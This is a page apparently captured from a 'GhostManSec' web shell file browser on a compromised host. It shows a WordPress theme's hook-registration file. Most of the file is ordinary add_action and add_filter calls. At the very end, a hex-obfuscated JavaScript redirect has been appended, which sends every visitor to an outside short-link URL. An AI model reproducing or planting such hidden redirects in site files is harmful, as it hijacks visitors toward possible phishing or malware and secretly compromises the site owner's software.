GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/public_html/wp-content/themes/around/inc/around-template-hooks.php
<?php
/**
 * Around hooks
 *
 * @package around
 */

/**
 * Page
 *
 */
add_action( 'around_page', 'around_breadcrumb', 10 );
add_action( 'around_page', 'around_page_header', 20 );
add_action( 'around_page', 'around_page_content', 30 );

/**
 * Comments
 */

add_filter( 'edit_comment_link',  'around_edit_comment_link', 20, 3 );

/**
 * Blog
 *
 */

add_filter( 'around_get_breadcrumb', 'around_get_post_breadcrumb', 99, 2 );

add_action( 'around_posts_content_before', 'around_breadcrumb', 10 );
add_action( 'around_posts_content_before', 'around_archive_header', 10 );


add_action( 'around_loop_post_sticky', 'around_featured_badge', 10 );
add_action( 'around_loop_post_sticky', 'around_sticky_post_thumbnail', 20 );
add_action( 'around_loop_post_sticky', 'around_sticky_post_card_body_wrap_start', 30 );
add_action( 'around_loop_post_sticky', 'around_loop_post_card_body', 40 );

add_action( 'around_loop_post_sticky', 'around_sticky_post_card_body_wrap_end', 60 );


add_action( 'around_loop_after', 'around_loop_paging_nav_wrap_start', 10 );
add_action( 'around_loop_after', 'around_results_count', 20 );
add_action( 'around_loop_after', 'around_pagination', 30 );
add_action( 'around_loop_after', 'around_loop_paging_nav_wrap_end', 40 );

/**
 * Single Post
 *
 */
add_action( 'around_single_post', 'around_single_post_header', 10 );
add_action( 'around_single_post', 'around_single_post_meta', 20 );
add_action( 'around_single_post', 'around_single_post_content', 30 );

add_action( 'around_single_post_bottom', 'around_single_post_footer', 10 );
add_action( 'around_single_post_bottom', 'around_single_post_nav', 20 );
add_action( 'around_single_post_bottom', 'around_display_comments', 30 );
add_action( 'around_single_post_bottom', 'around_single_related_posts', 40 );


add_action( 'around_share', 'around_share_display', 10 );

/**
 * Protected Post Custom Password Form
 */
add_filter( 'the_password_form', 'around_post_protected_password_form' );

/**
 * Comments
 */

add_filter( 'comment_form_default_fields', 'around_comment_form_default_fields', 20 );


/**
 * Navbar Solid
 *
 */
add_action( 'around_navbar_solid', 'around_navbar_toggler', 10 );
add_action( 'around_navbar_solid', 'around_navbar_brand', 20 );
add_action( 'around_navbar_solid', 'around_offcanvas', 40 );
add_action( 'around_navbar_solid', 'around_dashboard_user_account', 30 );

/**
 * Navbar Dashboard
 *
 */
add_action( 'around_navbar_dashboard', 'around_navbar_toggler', 10 );
add_action( 'around_navbar_dashboard', 'around_navbar_brand', 20 );
add_action( 'around_navbar_dashboard', 'around_offcanvas', 30 );
add_action( 'around_navbar_dashboard', 'around_dashboard_user_account', 30 );

/**
 * Navbar Shop
 *
 */
add_action( 'navbar_shop_topbar', 'around_navbar_shop_topbar', 10 );

add_action( 'around_before_navbar', 'around_site_search', 10 );

add_action( 'around_navbar_shop', 'around_navbar_toggler', 10 );
add_action( 'around_navbar_shop', 'around_navbar_brand', 20 );
add_action( 'around_navbar_shop', 'around_offcanvas', 40 );
add_action( 'around_navbar_shop', 'around_header_icons_links', 50 );

add_action( 'around_header_links', 'around_navbar_search', 10 );
add_action( 'around_header_links', 'around_shop_user_account',  20 );
add_action( 'around_header_links', 'around_navbar_cart',  30 );

/**
 * Navbar Button
 *
 */
add_action( 'around_navbar_button', 'around_navbar_toggler', 10 );
add_action( 'around_navbar_button', 'around_navbar_brand', 20 );
add_action( 'around_navbar_button', 'around_offcanvas', 40 );
add_action( 'around_navbar_button', 'around_navbar_action_button', 30 );

/**
 * Navbar Social
 *
 */

add_action( 'around_before_navbar', 'around_site_search', 10 );

add_action( 'around_navbar_social', 'around_navbar_toggler', 10 );
add_action( 'around_navbar_social', 'around_navbar_brand', 20 );
add_action( 'around_navbar_social', 'around_offcanvas', 40 );
add_action( 'around_navbar_social', 'around_navbar_social_tool_links', 50 );

add_action( 'around_social_header_links', 'around_navbar_search', 10 );
add_action( 'around_social_header_links', 'around_navbar_social_links',  20 );


/**
 * Modal
 */
add_action( 'around_before_header', 'around_wc_modal_in_navbar', 20 );
add_action( 'around_before_header', 'around_offcanvas_toggler', 30 );
add_action( 'around_before_header', 'around_navbar_modal', 40 );


add_action( 'around_before_404', 'around_wc_modal_in_navbar', 20 );


add_filter( 'around_enable_boxshadow', 'around_404_page_boxshadow' );


/**
 * Footer
 *
 */

add_action( 'around_footer',            'around_footer_default_widgets', 10 );
add_action( 'around_footer',            'around_footer_default_copyright', 20 );


add_action( 'around_after_footer',      'around_scroll_to_top', 10 );
add_action( 'around_after_footer',      'around_handheld_toolbar', 20 );


add_action( 'around_handheld_toolbar',  'around_handheld_toolbar_toggle_blog_sidebar', 10 );

add_action( 'around_footer_simple',     'around_footer_links', 10 );
add_action( 'around_footer_simple',     'around_footer_default_copyright_text', 20 );


add_action( 'around_footer_simple_2',   'around_social_media_links', 20 );
add_action( 'around_footer_simple_2',   'around_footer_default_copyright_text', 10 );

add_action( 'around_footer_shop',       'around_footer_shop_widgets', 10 );
add_action( 'around_footer_shop',       'around_footer_shop_bottom_bar', 20 );

add_action( 'around_footer_blog',       'around_footer_blog_top_bar', 10 );
add_action( 'around_footer_blog',       'around_footer_blog_bottom_bar', 20 );

add_action( 'around_footer_v6',         'around_footer_v6_widgets', 10 );
add_action( 'around_footer_v6',         'around_footer_default_copyright_text', 20 );

add_action( 'around_footer_v7',         'around_footer_v7_widgets', 10 );

add_action( 'around_footer_v8',         'around_footer_v8_widgets', 10 );

add_action( 'around_footer_v9',         'around_footer_default_copyright_text', 10 );

add_filter( 'pre_get_avatar_data',      'around_custom_uploaded_pre_avatar_override', 10, 2 );
add_filter( 'get_avatar_url',           'around_custom_uploaded_avatar_url_override', 10, 3 );
add_filter( 'get_avatar_data',          'around_custom_uploaded_avatar_override', 10, 2 );

/**
 * Nav Menu Widget Handle Custom Fields
 */
add_filter( 'in_widget_form',          'around_custom_widget_nav_menu_options', 10, 3 );
add_filter( 'widget_update_callback',  'around_custom_widget_nav_menu_options_update', 10, 4 );
add_filter( 'widget_nav_menu_args',    'around_custom_widget_nav_menu_args', 20, 4 );

add_action( 'coming_soon',          'around_coming_soon_content', 10 );

require get_template_directory() . '/inc/template-hooks/portfolio.php';
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>